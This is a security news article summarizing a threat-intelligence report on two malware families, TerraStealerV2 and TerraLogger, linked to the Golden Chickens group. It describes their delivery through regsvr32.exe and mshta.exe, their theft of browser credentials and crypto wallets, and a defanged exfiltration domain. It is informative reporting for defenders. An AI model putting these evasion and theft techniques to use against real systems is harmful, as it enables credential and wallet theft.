Ddos 
Flow chart illustrating TerraStealerV2’s anti-analysis checks (Source: Recorded Future)
The Insikt Group at Recorded Future has detailed two newly discovered malware families linked to the infamous Golden Chickens (a.k.a. Venom Spider), a financially motivated threat actor known for its stealthy Malware-as-a-Service (MaaS) platform. The report, published on May 1, 2025, reveals TerraStealerV2 and TerraLogger as the latest additions to Golden Chickens’ expanding malware arsenal.
These malware strains build upon Golden Chickens’ legacy of modular cyberweapons like VenomLNK, TerraLoader, and TerraCrypt—tools that have been used in past high-profile attacks against British Airways, Newegg, and Ticketmaster UK.
TerraStealerV2 is a stealer malware designed to target browser credentials, cryptocurrency wallets, and browser extensions. Delivered through LNK, MSI, DLL, and EXE files, it cleverly leverages trusted Windows tools like regsvr32.exe and mshta.exe to evade endpoint detection.
It fails to decrypt credentials protected by Chrome’s Application Bound Encryption (ABE)—a modern security measure introduced in mid-2024. As the report explains: “TerraStealerV2 lacks support for decrypting Chrome ABE-protected credentials, indicating the tool is likely outdated or still under development.”
Yet despite this shortfall, TerraStealerV2 can still exfiltrate unprotected data and copy cryptocurrency wallet directories before uploading them to Telegram bots and wetransfers[.]io, a lookalike domain hosted behind Cloudflare.
TerraLogger is a standalone keylogger, the first of its kind developed by the group. It logs keystrokes locally using a low-level keyboard hook and stores them in plaintext files like save.txt, f.txt, and a.txt in C:\ProgramData.
“TerraLogger represents the first observed use of a keylogging capability in malware developed by Golden Chickens,” the report notes.
While the malware doesn’t currently include any command-and-control (C2) or exfiltration logic, the consistent use of modular design implies it is either still evolving or intended to be combined with other components of the Golden Chickens toolkit.
Golden Chickens appears to be refining their delivery techniques by blending VenomLNK attacks with payload delivery via Windows-native tools. One observed sample even overlaps with known ClickFix infrastructure—using .lnk files masquerading as .mp4 videos and launched via mshta.exe.
“Across all observed cases, the TerraStealerV2 OCX payload was retrieved from the URL wetransfers[.]io/v.php… and executed via regsvr32.exe,” the report explains.
Despite limitations in its current versions, both malware families are part of a broader evolution of Golden Chickens’ malware suite. According to the report: “Ongoing development activity… suggests these tools may still be maturing… their deployment is expected to remain closely aligned with Golden Chickens’ historical use of stealth-oriented malware to support financially motivated operations.”
Donate